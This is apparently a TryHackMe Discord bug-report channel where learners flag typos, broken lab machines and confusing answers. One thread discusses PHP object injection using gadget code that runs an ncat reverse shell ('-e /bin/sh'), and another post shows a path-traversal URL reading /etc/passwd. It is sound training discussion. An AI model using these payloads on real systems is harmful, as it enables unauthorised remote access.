i've done the room and it works fine if you wait 6-7mins after starting it and doing anything
Strange, I def waited long enough for the room to boot. I ran the pcap numerous times with the same result....I'll give it another try. Thanks 🙂
Gave +1 Rep to @median coral (current: #17 - 411)
guys is it possible that some people are just having fun destroying networks?
again I try the persisting-ad room, i can do things for like 10 minutes and then suddenly DC is not acting as DNS anymore, machines are not found
Hey there 🙂
May I ask if you were unable to finish the room back then, due to the target machine?
We have increased the resources now, but I would like to know your opinion if the now set resources you think are sufficient?
Hi, I was able to finish the room, but it took forever to do anything. I had to stand up and take a walk for each action I did. It's wonderful that the room has more resources now 🙂
PS: I love the DFIR rooms on TryHackMe. They really helped me during preparation to a collage exam this week.
Ah okay, if you already done with the room, then I'm giving it a quick try myself now 🙂
Glad to hear it helped you!
hey
https://tryhackme.com/room/btsysinternalssg
Question: Using WHOIS tools, what is the ISP/Organization for the remote address in the screenshots above?
IP resolves to Amazon, not the answer that was intended.
Typo https://tryhackme.com/room/btwindowsinternals Task 11 - Question 1
'What is the non-existent process for explorer.exe?'
Should be
'What is the non-existent parent process for explorer.exe?'
Cheers
Typo https://tryhackme.com/r/room/tmuxremux Task 2 last question
"How to kill all tmux sessions accept the one currently in use? With the name "notes"."
Should be
"How to kill all tmux sessions except the one currently in use? With the name "notes"."
Have a good one
Another Typo in https://tryhackme.com/r/room/tmuxremux Last sentence in the reading part
"For the join-pane commands adding -v on the end fuses the two panes together horizontally. Adding -h on the end of the join-pane command fuses two panes together vertically."
Should be
"For the join-pane commands adding -v on the end fuses the two panes together vertically. Adding -h on the end of the join-pane command fuses two panes together horizontally."
I don’t think a typo would be considered a bug
This is the channel to report typos.
small issue with https://tryhackme.com/r/room/webosint - the format of the answer in Task 7 is confusing: I've spent quite some time on it, finally opened a writeup and it turns out the IP owner (the common link) used to be displayed as Liquid Web L.L.C, now it's just LIQUIDWEB. When I typed Liquid Web into Google, they use the name Liquid Web (without L.L.C) basically everywhere; I've found only one occurrence of Liquid Web L.L.C. Not really sure if that's a bug, but definitely looks like unintended additional difficulty
Ok now I see they are displayed as Liquid Web, L.L.C on ipinfo, so I guess I could have got that after further research
I believe that there is an issue with the way that Enumerating Active Directory is set up. When entering the room and launching the web-based AttackBox, the .ovpn file for the "enumad" interface does exist, but using "ip a" or "ifconfig" does not list the "enumad" interface. When using the "systemd-resolve" command to configure the DNS to the THMDC, an error occurs stating "enumad" doesn't exist as an interface. I have tried waiting multiple days between attempts, restarting the Box and the network, resetting room progress and formally leaving the room, but none of it works. It seems that the other AD networks all work perfectly fine however.
https://tryhackme.com/r/room/windowsforensics1 Task 10 Question 2
Correct answer is 'thm-user2' however answer box accepts 'thm-user' as an acceptable answer.
Must be answer tolerance. When you refreshed the page, did it reflect the correct user?
There’s answer tolerance? I must be missing out on something
Some answers allow for errors, the longer the answer the more tolerance to errors.
I got it working by doing a ctrl+f5 to reload all pages
Just to aid in to that, this is because e.g. js files might be cached by your browser, and thus not getting pulled again.
So by using ctrl+f5 you made a full refresh that pulled that js file again.
Just if that might help to understand why that happened 🙂
I've spotted a mistake in https://tryhackme.com/r/room/threatmodelling
In task 4, 2nd question the correct answer is 14, perhaps the matrix was edited
Hey good thought. Just checked - no still showing the original text 'thm-user' rather than 'thm-user2'. Mainly just flagging for any QA passes.
It's thm-user2 on my side.
Can you please verify and screenshot?
Is this intended or not? Wireshark basics room Task 5. Can be very difficult for users to read
Not intended. That's an interesting one, it looks okay in the task editor visually. Looks to be a CSS issue.
Saw a similar issue in one of the rooms I was working earlier. I'll put it in here when I get the chance.
Not really a bug, but there is a small mistake in the "Exploiting Active Directory" room, in the introduction:
Saw the similar issue in https://tryhackme.com/r/room/olympusroom -
There's a typo in
Assess is spelt correctly.
I thought it should be Assets. ok then
That section is called Assess and Report
You could well be right. 🙂
Burpsuite rooms with http://burp.cert should be replaced with http://burpsuite .. like https://tryhackme.com/r/room/burpsuitebasics task 13
Hey in room Windows Forensics1: https://tryhackme.com/r/room/windowsforensics1 there are missing photos
Which task?
sorry -> Data Acquisition
Where are you seeing burp.cert?
That will not work.
burp**/**cert (which is the one I'm seeing in that task) will work and is correct.
didnt work for me
Burpsuite rooms with http://burp.cert should be replaced with http://burpsuite .. like https://tryhackme.com/r/room/burpsuitebasics task 13
Hey, wanted to report a bug on https://tryhackme.com/r/room/threatinteltools on task 6 Cisco Talos Intelligence: when I search the whois tab I get an error "We can't find any results. Possibly IP address is unallocated or its whois server is not available."
Yeah, so that's literally just a copy paste of the same report lmao
Can you post a screenshot of the output of this command please:
curl -x 127.0.0.1:8080 http://burp/cert
Update suggestion to https://tryhackme.com/r/room/johntheripper0
The room suggests using hash-identifier but https://github.com/psypanda/hashID says "This replaces hash-identifier, which is outdated!"
ayo any admin here ?
for CTF collection Vol.1 many flags are in the source code, even for other questions that are related to decoding
exactly 10 flags
root@ip-10-10-157-94:~# curl -x 127.0.0.1:8080 http://burp/cert
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
It does seem to work now, the cert is being downloaded with that link, like no other things to click. Before I just landed on a "Burp" page with "not being able to resolve"
Damn, yea, sorry for all this, damn I'm stupid, I guess I did a dot instead of a slash and landed on that unable to resolve and yea, sorry for wasting time
Np 🙂
Here you go cheers https://drive.google.com/file/d/1Fk7XaeRLbYlHwYByvae5eM2_5Vl__fmu/view?usp=sharing (I wasn't able to add an image in discord)
Zero issue for me going through the room. Was more just as feedback
You can verify your account to allow you to send screenshots directly.
@cinder spire
Hi, I don't know if it belongs here, but in the Kenobi room https://tryhackme.com/r/room/kenobi there is a little confusing mistake. The command "smbget -R smb://10.10.123.13/anonymous" is there as the command for recursive download. Instead of "--recursive" there is "-R", which is an alias for "--name-resolve".
Hi - in the Introduction to Cryptography in the Introduction to Security Engineering learning path I started an attackbox for Task 2 to decrypt quote02 using OpenSSL. It seems the attackbox has a different version of OpenSSL than what was used to encrypt the quote02 file because I keep getting an error saying it was a bad decrypt
On https://tryhackme.com/r/room/rfirmware, Task 3 Step 4 refers to /opt/Dumping-Router-Firmware-Image/...., however this path won't exist since in Task 1 we cloned the repo to /opt/Dumping-Router-Firmware/ (Without the -Image) resulting in the step failing to run.
https://tryhackme.com/r/room/btopenedr seems to be completely broken.
Same thing for me no matter what room I check. Haven't checked them all but the ones I did look similar to this.
Been raised with staff earlier, known issue
Awesome cool thanks! Good to know it isn't just me though.
Gave +1 Rep to @topaz thorn (current: #68 - 93)
Hi, can anyone help with an auth issue in the https://tryhackme.com/r/room/cicdandbuildsecurity I lost my authentication token to Mother and now cant authenticate or Register again even after a room reset?
Any Luck?
debug1: load_hostkeys: fopen /home/kali/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY ......stuck here, cannot connect to ssl. Can anyone help?
What are you doing?
From this, there is little context; we have no way of knowing what you're expecting the outcome to be.
can't connect to machine ssl
Which machine?
Images missing in task 4 https://tryhackme.com/r/room/windowsforensics1
Hello, I am currently trying to solve the room Island Orchestration, but there is only port 22 / ssh open. I tried it with the attackbox and my own system. Is there something I overlooked or is this challenge maybe broken? As I already saw, other users had similar problems (see #room-bugs message and #room-bugs message)
Do look at the suggestion described here:
https://unix.stackexchange.com/questions/722954/ssh-stuck-at-expecting-ssh2-msg-kex-ecdh-reply
I suggest doing a Google search on the error message to help you troubleshoot any issue you may encounter.
thank you sir
all machines, but thank you sir, it already works
Gave +1 Rep to @quaint sparrow (current: #1 - 2158)
Hello everyone, I've been trying to solve the room GREP for two days and it looks like something is missing to solve it. We're supposed to use osint skills to find an api key, but it looks like we can't find it anywhere; maybe a github account has been removed or something? Am I wrong? Thanks in advance for answers
No, the github account is still up.
oh ok, I'm gonna try harder then, thank you by the way
Gave +1 Rep to @quaint sparrow (current: #1 - 2159)
There's two different places the API key can be found. 🙂
okok i'm gonna look for them then ^^
I'm pretty sure Island Orchestration is broken, was running into the same issues. Looked up a writeup and it mentioned ports 80 & 8443 were supposed to be open
Do you know what to do to solve this issue? This might be a problem with the pods I guess
No, probably would need to reach out to the creator/thm.
I think it's more an issue with the k8s apiserver not booting (uses port 8443)
How long did you wait? I know some rooms, the vm can take a while to be fully booted. If it's been up five minutes and still nothing then I'd guess something is wrong - though I don't remember if I've done this room or not so I'm going off my sense of how tryhackme usually is
Waited at least 15 minutes
There is an issue with H1 in KoTH. I entered my username in king.txt and it registered 0 king time.
In this room the OSINT website named DeepPaste is not available now
That one's on my to-do list to check...osint rooms are always a bit hard to maintain
Oh that part, I never got that working and don't know if it's intentional or not
The dark Web site has closed, there's been a screenshot placed on a github with the answer, it's in the hints.
Yeah, it's been that way a while now
@crystal bolt Ghost of KDC_ERR_PADATA_TYPE_NOSUPP has stuck me as well in offensive Security Lab - Persisting Active Directory - Please push the certs
@gleaming shadow #room-bugs message - Can you assist me..
In the TryHack3M: Sch3Ma D3Mon
There is a small inconvenient submission bug when submitting the answer in Task 1 Question 1.
I misspelled one of the answers by a character and it accepted it.
This is okay, there's a tolerance on answers that would explain this behavior. 🙂
- Loops repeat until the written code is finished running (true/false)
(Answer format:****)
Might be good to upgrade to a yea/nay or y/n format for this answer.
Also, the question is a bit ambiguous IMHO - could instead be (e.g.) Loops repeat until their stop-condition is met (true/false)
https://tryhackme.com/r/room/javascriptbasics
Please help, where did I go wrong?
You have a space in your answer
This image is still missing as at today.
https://tryhackme.com/r/room/javascriptbasics
Task 1: photo is not available
Not sure if this is the best channel to report this, but in /r/room/owasptop10 - task 20 - a reference is made to XSS-Payloads.com (http://www.xss-payloads.com/) . I wanted to try to see if I could find a payload to answer one of the questions in task 20, but the XSS-Payloads.com is no longer working (domain seems to have been abandoned)
xss-payloads.com is your first and best source for all of the information you’re looking for. From general topics to more of what you would expect to find here, xss-payloads.com has it all. We hope you find what you are searching for!
yeah that would go here
https://tryhackme.com/r/room/intromalwareanalysis Task 6
The Cuckoo's Sandbox external hyperlink (https://cuckoosandbox.org/) is broken. New home for that project is now at https://github.com/cuckoosandbox/cuckoo
I guess i found a little bug at https://tryhackme.com/r/room/activerecon
Section Netcat
But open ports are
Have you started the correct machine?
Can you screenshot the Target Machine Information?
Oh, there is a second machine, please forgive me
Yeah, the Netcat task has its own machine. 🙂
don't worry about it, you're not the first, certainly not the last.
Jr Penetration Tester > Introduction to Web Hacking > Intro to SSRF > Task 3 talks about requestbin.com, but that has been rebranded/bought and is now pipedream
Which version of Firefox are you using?
Kali linux default one
Can you check the version please?
Version 115.8.0.0esr 64 bit
Can you try it on another browser? It works on Firefox 125.0.2 latest.
I will try tomorrow to update the browser and try again
It should show a modal (popup) with the flag when all tiles are in the right order and have a green highlighting.
Yep it did, the thing was that I had one of the things I can move twice
Once you close the modal the last piece should disappear from the left-side Contents list, is that what you're referring to?
Yep
Ok so it was a visual bug from my own version of the browser, ok
JVM reverse engineering is there not meant to be a .jar file as part of the task files for Task 6?
nvm found it
Room - John The Ripper
https://tryhackme.com/r/room/johntheripper0
Task 11 - Typo
"python3 /opt/ssh2john.py" in task text should read "python3 /opt/john/ssh2john.py" for the correct location of ssh2john on AttackBox
About this room: https://tryhackme.com/r/room/encryptioncrypto101
There is this phrase and I think it is wrong:
DO NOT encrypt passwords unless you’re doing something like a password manager. Passwords should not be stored in plaintext, and you should use hashing to manage them safely.
Because you cannot use hashing that can be broken with a dictionary attack. To store a password you need to use other protocols
What other protocols do you suggest?
like: scrypt or other algorithms with salt
scrypt is a hashing algorithm isn't it? 🙂
yeah, but scrypt and PBKDF2 are preferred instead of a classic MD5 or SHA256
If you say it's my misunderstanding, I apologize for bothering you
Is anyone also experiencing a problem accessing splunk in the Splunk: Data Manipulation? I have the message Error code: 405, Message: Method Not Allowed.
Are you using the correct ip?
I use the IP under "Target IP Address" shown when I started the machine
https://tryhackme.com/r/room/threatinteltools
Task 6 Question 2 - the customer name of the IP address
I was struggling with this so looked up walkthroughs. They show the whois returning the customer name for the IP; however Talos Intelligence shows the WHOIS is not found (image included)
https://talosintelligence.com/reputation_center/lookup?search=204.93.183.11#whois
The domain name has either redacted the customer name or it does not exist
The hint also advises to run the whois on the IP, achieved by the above link
https://tryhackme.com/r/room/x8664arch
Task 4 - Carry Flag
Denoted by CF, the Carry Flag indicates when the last executed instruction resulted in a number too big or too small for the destination. For example, if we add 0xFFFFFFFF and 0x00000001 and store the result in a 64-bit register, the result will be too big for the register. In this case, CF will be set to 1.
Wasn't it meant to say a 32-bit register instead of a 64-bit one? Because 0xFFFFFFFF is four bytes, or 32 bits
Hi @dusky junco, sorry to disturb. I suppose there is an issue with the "Island Orchestration" room ( https://tryhackme.com/r/room/islandorchestration ). It looks like only the SSH port is open, maybe other services don't start?
there is an error in the room OSI Model
https://tryhackme.com/r/room/osimodelzi
in the Task 4 Layer 5 - Session it says that "the session layer will begin to divide up the data sent into smaller chunks of data and begin to send these chunks (packets) one at a time."
as I know the Layer 5 and above PDUs are simply referred to as data.
can anyone explain this
in this room
https://tryhackme.com/r/room/introtoav
of AV evasion it mentions file scan sites that don't share data
but the second one, I think they updated their terms
they clearly say we share data
room https://tryhackme.com/r/room/sysmon
What is the first exe the process executes in Investigation 1?
When you look at the EventViewer logs date/time, the right answer is marked as not being correct
instead when you open the logs, it's the first process creation log that holds the answer, but that's not the first when looking at date/time
first process creation is at 6:57:48, while the 'correct' answer is in the process creation log of 6:57:51
Hello. The room Phishing Analysis Fundamentals Task 4 has a problem. The article used in the link is not working, so there is no way to answer the questions.
I've found that article in wayback machine - here's a link to it
Thank you!
Gave +1 Rep to @gentle tree (current: #1034 - 3)
pretty sure it is the room problem
going through the rooms right now, and I'm super annoyed by that room because it's kind of broken in many places
||actually I guess nvm, it seems raw data and listed data on the Namecheap whois site are different......... wtf|| ... also I wouldn't know how to get there unless I looked at the write-ups cuz ||Namecheap's whois seems to not link it anywhere unless I'm blind||
seems like ||ICANN|| has it all updated, and it includes ||the raw data links||... so maybe the room owner can change to that instead?
kind of half irritated at the room, but now I kinda see the situation better that this is on ||Namecheap|| for not updating the info correctly
I've been trying to figure out what I'm doing wrong on this room for two days. No matter what, I never get a scan result from Nessus that gives me anything other than Apache version 2.4.25. I thought I was going mad until I saw people mentioning it in here as well. I've even watched walkthroughs and do exactly what they're doing (on two different machines) and still cannot get the results they are.
Room: File Inclusion, Task 5 (LFI 2), Question: "Give la Number 2 a try..."
I was able to complete the objective of lab number 3 with the URL http://10.10.251.229/lab3.php?file="includes/../../../../../etc/passwd "
When entering the answer for the question I cannot figure out the right syntax, this is the only way i could get the passwd file to dump, but the format for the answer only has 4 ../s. Either way I cannot find the right syntax for the answer, despite having done what the question asks.
Please help.
In Daily Bugle
In the first question, they want you to type a name but the "correct" answer is spelled differently than on the website
Screenshot?
If its the hyphen, it's not a bug.
The website has the hyphen everywhere but the answer doesn't
If thats 👌 then np, not a big problem but got me confused for a second lol
In the room Snort Task 9, under the General Rule Options section, the Sid description incorrectly says "the rules we will create should have sid greater than 100.000.000" when it should be 1.000.000
Virtualization and Containers room task 6 is dead. This room is for subscribers, which means we pay for it. Please do your job properly!!!
Please could you explain how it's dead and what you expect/should happen
Screenshots would be great, if you can also provide these please
kubectl commands are not working.
Sure
minikube start output
kubectl get pods output
I'll raise it
is the room in question
the post exploitation challenge at the end seems to be broken as the supposed file secrets.txt doesn't exist despite it returning from my search
It returned a path but when i cd'ed into it there was nothing
Can you verify and show a screenshot.
As this worked a few days ago.
i even tried using cat/edit and other commands the file seemed to have mysteriously vanished
one moment
yeah one sec mate
are you talking about the GUI?
yessir
Yeah
I'm not too familiar with how to, I'm afraid
In that screenshot you're not going to the correct folder.
😄
my bad sorry for wasting your time
You didn't waste anybody's time.
You learned something new 🙂
at least I can post images now haha
yeah making mistakes is a part of learning
it's normal and nothing to be ashamed of 😄
Task 3 Question in https://tryhackme.com/r/room/xss. There is only so many variations of the answer directly above in the module that I would think you could enter but nothing is correct... A pretty simple question with what would seem is the answer right above it.
... nevermind. 😐 Figured it out... sheesh.
Confirming this bug is still present
Do you know if any progress has been made on this? The path can't be completed until it's resolved.
Sorry, i’m not sure i’m away this week so haven’t been able to check
It’s not the correct answer, it’s not a bug
Please can you remove the image?
Can't you remove it?
You have my permission
I don't need your permission to remove their image,
However if I delete it, it will remove their post also.
Did you just remove it?
lol
Yes.
To prove a point.
- I don't need your permission
- It removes the full post.
Where as they could have just removed the image.
Yeah, forgot about nr 2, but you wouldn't have removed the post if I hadn't made my stupid comment 😉
But it's okay Mr Moderator, you are the big boss
ples no ban
I would have removed it after x amount of hours
Makes sense
Has this been resolved??? Thanks
Gave +1 Rep to @topaz thorn (current: #59 - 118)
Unfortunately I’m not sure i’m away this week so haven’t been able to check
nw.... whenever you get back and get a chance to update, please do. I'll move on and come back to it. Thanks
Gave +1 Rep to @topaz thorn (current: #57 - 119)
I can't answer question 3 because of the same reason
What'd the spelling error?
What's *
I don't know if this is the right place to ask, but I'm having some performance issues accessing the Burp Suite Room because of the animations on the first 2 sections
For the record, I have a very decent computer and the issue was fixed by deleting the DOM elements
I think there's a bug on the "Wireshark: Packet Operations" Task 3 - Question: What is the most used IPv4 destination address?
The correct answer is 10.10.57.178 instead of 10.100.1.33.
room: insecure_deserialisationv1.37
task: Exploitation - Object Injection
Unless I'm mistaken, I think the vulnerability doesn't work the way the author teaches it.
How it's supposed to work
"when untrusted data is passed to the unserialise() function, allowing attackers to manipulate the serialised data to execute arbitrary code. By crafting a malicious serialised object with a specially crafted wakeup() or destruct() method, attackers can achieve remote code execution, leading to serious security breaches."
My understanding:
If a server unserializes any objects, then we just need to know the name of an existing class to be able to get an RCE
How it really works
If a server unserializes any objects, AND there is a class with a wakeup() or destruct() method AND in one of those functions there is already code to execute system commands (exec($this->command); here), then we can get an RCE by sending our own class and changing the value of the command string. Which is a much, much rarer occurrence!
Proof 1:
The content of test.php on the server
<?php
// Class already present on the server; exec() on a
// user-controlled property is what makes the gadget work.
class MaliciousUserData {
    public $command = 'ncat -nv 10.10.190.217 4444 -e /bin/sh';
    // Magic method run automatically by unserialize()
    public function __wakeup() {
        exec($this->command);
    }
}
...
If we remove the wakeup function from the test.php file -> we can't get a reverse shell anymore
Proof 2:
If we send our own class without a wakeup function, we get an RCE
// Attacker-side class: only the property value is changed
class MaliciousUserData {
    public $command = 'ncat -nv 10.11.85.5 4444 -e /bin/sh';
}
Proof 3:
If we create a new public property and try to pass it to our own exec, the code isn't executed
// Attacker-side class with a new property and its own __wakeup():
// neither the property nor the method exists server-side
class MaliciousUserData {
    public $c = 'ncat -nv ATTACK_IP 4444 -e /bin/sh';
    public function __wakeup() {
        exec($this->c);
    }
}
TLDR
- PHP object injection isn't about "being able to add your own malicious code to an existing class" cf "What if we recreate a class MaliciousUserData with a __wakeup() method, a magic method in PHP that is automatically called during deserialisation?" -> because it doesn't work (cf Proof 1 and 3)
- it's about "being able to edit a property string" -> cf https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection
@cold haven You are right, the text in the room is at least ambiguous. This exploit only works if you know an exact class (more correct: object) from the server code that you create a copy of in your exploit code. You can only manipulate the properties that exist in the original class and you only ever achieve RCE if the original class was written in such way that it executes user input (here with exec()) and has __wakeup() or similar.
The text does say
From a source code review or considering whether the framework is open source, the pentester knows that test.php contains a class called MaliciousUserData
but before it already sets wrong expectations with
Now, the vulnerability arises when untrusted data is passed to the unserialise() function, allowing attackers to manipulate the serialised data to execute arbitrary code.
That suggests all we need to find is a function that unserializes untrusted data and we get RCE. That's wrong in this context and confusing if you don't know better already, which the typical reader does not.
The vulnerability arises when untrusted data is passed into unserialize() AND an object on the server-side code already executes/evals untrusted data AND contains __wakeup(). At that point the reader hasn't seen the code in test.php. He neither knows that those points are required for the exploit to happen (on the contrary, he is given the impression that's not the case) nor does he know whether they are present in the server-side code. In fact he never sees that file, unless he opens it on the server after(!) running the exploit. Highly confusing.
Also from the room
By crafting a malicious serialised object with a specially crafted __wakeup() or __destruct() method, attackers can achieve remote code execution, leading to serious security breaches.
again giving the impression that it's the attacker's choice to implement these functions and achieve RCE that way, when in fact that's only an option if they are already present in the server-side code. I can see how an author who knows this stuff might assume it's obvious, but for someone with no prior knowledge it's misleading.
Glad to see I'm not the only one confused by this (and that I understood the problem correctly, since I'm learning about PHP Object Injection for the first time).
I don't want to make bad assumption, but I suppose the author thought we're indeed executing our own wakeup() function, because
By crafting a malicious serialised object with a specially crafted __wakeup() or __destruct() method, attackers can achieve remote code execution, leading to serious security breaches. (this part indeed) - In the given code example, the custom class of the object we're serializing contains its own wakeup() function cf #room-bugs message
@rough needle If you have the time, could you share your thoughts on this matter? Starting here #room-bugs message
in task 1 it is accepting it as "start" topology. not big issue. just letting you guys know
Hello
Happy to share my thoughts
My understanding: If a server unserializes any objects, then we just need to know the name of an existing class to be able to get an RCE
This is incorrect. To exploit a PHP Object Injection vulnerability, the application should include a class featuring a PHP magic method (like __wakeup or __sleep) that can be exploited for malicious purposes. All classes involved in the attack should be declared before calling the unserialize() method (unless object autoloading is supported).
Which is a much, much rarer occurrence!
While insecure deserialisation is not as widely exploited as other web vulnerabilities like XSS and SQLi, it still poses a significant threat. You can get an idea of how developers make mistakes leading to RCE or arbitrary file deletion by checking the Automation Task (Task 7).
You will be amazed to see how different frameworks like CodeIgniter, Laravel, etc. were vulnerable through vectors like __destruct and __wakeup leading to RCE or file deletion, and this is just PHP (see attached image). The attack surface and threat spectrum is huge. Please check this link regarding this vulnerability in other languages/frameworks.
https://www.acunetix.com/vulnerabilities/web/tag/insecure-deserialization/
I really appreciate your input. As you mentioned, you are learning PHP Object Injection for the first time. This actually allowed me to provide better insight and tailor the content according to the audience. I have modified the relevant task content to make it simpler and clearer.
The updated room text is 100x better and imo very clear now. Nice to see such a quick change!
Awesome. Glad it helps 🙂
That's answer tolerance, if you get 95% of the answer correct it will accept it, once you refresh it should provide the actual answer
Thanks for the quick changes, this part is indeed much clearer now, especially since we're not serializing our own wakeup function anymore which was the most ambiguous part (cf yet an other user that understood it like I did, and no one corrected him #1237418982005538889 message)
Gave +1 Rep to @rough needle (current: #149 - 46)
Hi, there is a broken functionality in the Room "Obfuscation Principles" I just started the machine and when I browse to /upload-1.php all I get is some XAMPP Warnings and no page
Also for Task 4 you are supposed to upload an "obfuscated" PowerShell snippet to /challenge-1.html, however you get the flag even if you upload the original (non-obfuscated) file
idk if this is a bug but it's very confusing. For one of the questions in the Windows Event Logs Task 4 it says look at Example 8. In reality it's Example 2
Hello, on Burp Basics, Task 10 Site Map and Issue Definitions: does anyone have any idea why I can't go through http://Machine_ip/ ?
Are you using machine_ip or an actual IP?
using IP from attackbox
Can you share a screenshot?
@quaint sparrow yeah
You've started the wrong machine.
Or accessing the wrong IP, rather.
@quaint sparrow that's not supposed to be the ip machine from tryhack me ?
There are two machines to start, one is the AttackBox if you need it, the other is the room target machine.
Sometimes in Task 1, 2 or 9.
Or could be in any task really
@whole hedge
@quaint sparrow
Yes, if you look in Task 9 there is a green Start Machine button.
I was solving Investigating window 3.x and there is a file missing in the machine. "Sysmon.evtx". This file is required to solve the 2nd question and all the questions after are inter-dependent.
can anyone help?
any update on this?
not really a bug maybe a typo, but the confluence room referring to CVE-2023-22515 has a VM title that refers to CVE-2023-23397
only that I can confirm the file is missing
yep so is it a bug?
Why do you need the file?
To solve the second question and further questions
You don't need sysmon
In fact, the full room is solvable without it.
without the evtx file?
Yeah.
ok then .. will try
thanks btw
It's not sysmon that's missing. It's the log file one is supposed to analyse.
I completed the room without the log file.
The room itself names the sysmon room as a prerequisite
Rooms should imo not be fundamentally changed after publishing. This file has existed in the past which allowed using the techniques taught in the rooms that it lists as prerequisites.
Reasonable expectation to assume the file should still be there.
It isn't very often that rooms are changed after they're released.
Where are you looking for the file?
on the desktop
It's supposed to be on the desktop, but I'll ping staff.
okay !!! thanks
I hope someone could fix Wreath network (you can't access the GitStack site from the local machine after pivoting), it takes forever.
could be because it tries to force tls/ssl when there is none
how can i verify that ? it just keeps loading
well the web browsers settings
i used curl -k to ignore ssl , same thing
oh never mind then
-e Display the link-layer (TCP/IP/UDP/ICMP) headers. from https://tryhackme.com/r/room/snort.
Neither of those are link-layer protocols.
The link layer part is correct, according to the official snort documentation: Decodes Layer2 headers (snort -e).
Same room: "Start the Snort instance in verbose mode (-v) and use the interface (-i) "eth0"; sudo snort -v-i eth0". There's a space missing between the flags, it doesn't work like this.
@quaint sparrow you were right !!! I don't need the sysmon.evtx file. I had to search some where else .. !!
hello please i have issue in room
i can't connect to the node and ping 172.... is not working
with nmap it's filtered
no, it's not 127, it's 172.23.0.3
ip of the node
well all thm machines basically run on the 10.x.x.x network.... so how come you are attacking something on 172????
Hadoop is a network room, technically Docker
172.xxx.xxx.xxx is the IP range for the room.
oh interesting
but in the room i can try to check if it available
by using ping 172.23.0.3
and use nmap for running service on port 808p
but the ip edge node is 172.23.0.3
How long has the machine been running for?
10 min
I can't even get the hadoop VPN running.
What's your target ip?
there are 164 alerts only if you do "any 80 <> any any", but you need to write two rules, "any 80 any any" and "any any any 80", which gives 328 or so. You can only complete the room with both rules, but the first question gives a correct answer with only inbound traffic
This is not a bug, your answer is wrong. Let me search the screenshot so I don't reinvent the wheel...
number one
number two
How can my answer be wrong and also accepted as correct?
I meant 328 is wrong
But you can only solve the section if you do the full 328 rules
I got mindfucked by this for days trying to figure out why I wasn't getting the right packets
My screenshots explain the issue.
That is not the case.
There is no 328 packet log file. The file contains 164 TCP segments in total. You only get the number 328 if you count them double.
Open the file in wireshark if you want to confirm yourself.